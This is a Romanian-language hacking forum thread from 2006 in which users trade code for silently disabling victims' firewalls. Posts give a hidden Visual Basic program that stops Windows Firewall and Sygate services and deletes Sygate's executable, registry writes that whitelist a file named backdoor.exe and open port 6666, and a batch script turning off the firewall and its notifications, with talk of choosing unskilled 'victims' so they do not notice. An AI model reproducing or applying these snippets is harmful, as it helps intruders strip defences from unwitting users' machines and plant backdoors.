sony_buzi Posted October 15, 2006 Report Posted October 15, 2006 Din pacate pentru firewallu de la windowsu nu am gasit un fisier ca sa il setrg sa nu mai mearga.Private Sub Form_Load()App.TaskVisible = FalseMe.Visible = FalseShell "sc config sharedaccess start= disabled", vbHideShell "net stop smcservice", vbHideShell "sc config smcservice start= disabled", vbHideKill "C:Program FilesSygateSPFsmc.exe"Shell "netsh firewall set opmode mode = disable", vbHideEnd Sub Quote
Sad_Dreamer Posted October 15, 2006 Report Posted October 15, 2006 sony_buzi wrote: Din pacate pentru firewallu de la windowsu nu am gasit un fisier ca sa il setrg sa nu mai mearga.nu trebuie sa stergi nimic..trebuie sa faci niste intrati in registry ...imi pare rau ca nu imi amintesc exact unde ce si cumdata viitoare scrie si in ce este codul ....stiu ca este vb..dar poate altii nu stiu eu folosesc sygate il schimb acum Quote
sony_buzi Posted October 15, 2006 Author Report Posted October 15, 2006 offf ca mereu uit sa scriu ca e in VB...dar cunoscatorii stiu despre ce e vb...ma de informare Quote
Christian Posted October 16, 2006 Report Posted October 16, 2006 pentru a permite orice activitate a unui executabil (in cazul de fata cel din C:WINDOWSbackdoor.exe) folositi:Dim wSet w = Createobject("Wscript.Shell")w.regwrite "HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsListNume", "C:WINDOWSbackdoor.exe:*:Enabled:@xpsp2res.dll,-22019", "REG_SZ"pentru a permite orice activitate pe un anumit port (in cazul de fata 6666) folositi:Dim wSet w = Createobject("Wscript.Shell")w.regwrite "HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList6666:TCP", "6666:TCP:*:Enabled:@xpsp2res.dll,-22003", "REG_SZ" Quote
sony_buzi Posted October 16, 2006 Author Report Posted October 16, 2006 Nu-mi spune ca daca bag codu ala nu o sa mai aiba firewallurile treaba cu el... Quote
virusz Posted October 16, 2006 Report Posted October 16, 2006 pentru a dezactiva firewalu de la win, scrieti asta intr-un fisier gol cu extensia bat sau cmd..2click pentru vb stiti voi cum sa modificatzi ...@reg add "HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f>NUL@reg add "HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000000 /f>NUL@reg add "HKLMSYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f>NULavetzi grija ca nu e chiar corect ce scrie mai sus, sunt doar 3 linii, de la @reg add... pana la >nul.......bafta Quote
sony_buzi Posted October 16, 2006 Author Report Posted October 16, 2006 Presupun ca varianta ta merge numai pentru Firewallu din windows...dar daca are si altul ? Quote
sony_buzi Posted October 16, 2006 Author Report Posted October 16, 2006 Uita-te mai bine sa vezi ca este Firewall (Winndows&Sygate) Quote
virusz Posted October 16, 2006 Report Posted October 16, 2006 pentru a dezactiva firewalu de la win,nu stiu ce nu intelegi....fii mai atent next time Quote
Christian Posted October 16, 2006 Report Posted October 16, 2006 sony_buzi wrote: Nu-mi spune ca daca bag codu ala nu o sa mai aiba firewallurile treaba cu el...bineinteles ca nu o sa mai aiba incearca si o sa te convingi ... am uitat sa specific ca metoda se aplica doar pt fw-ul win-uluide ce sa dezactivezi firewall-ul (caz in care victima se poate prinde ca e ceva putred la mijloc) mai bine folosesti metoda asta .. Quote
sony_buzi Posted October 16, 2006 Author Report Posted October 16, 2006 virusz nu tie ti-am raspuns ...sorryDa Christian ai dreptate dar in caz ca victima are si alt Firewall atunci acela trebuie scos cumva Quote
Christian Posted October 16, 2006 Report Posted October 16, 2006 asta depinde de cum stii sa-ti alegi victimele :@ daca ai noroc numai de lameri ... e clar ca nici nu stiu ce-i ala firewall e destul de greu sa dezactivezi firewall-uri pt ca majoritatea au protectie pt asa ceva Quote
sony_buzi Posted October 16, 2006 Author Report Posted October 16, 2006 pai de exemplu la sygate nu are...si mai sunt Kaspersky si Zone Alarm ce se mai folosesc...dar gasim noi ceva si pt alea Quote
sony_buzi Posted November 6, 2006 Author Report Posted November 6, 2006 Christian acum am vazut ca codul acela pentru a permita orice activitate a unu executabil nu merge...trebuie ca programul sa apara acolo la Exceptions si sa fie bifat...poate afli codul...ar fi super..ms Quote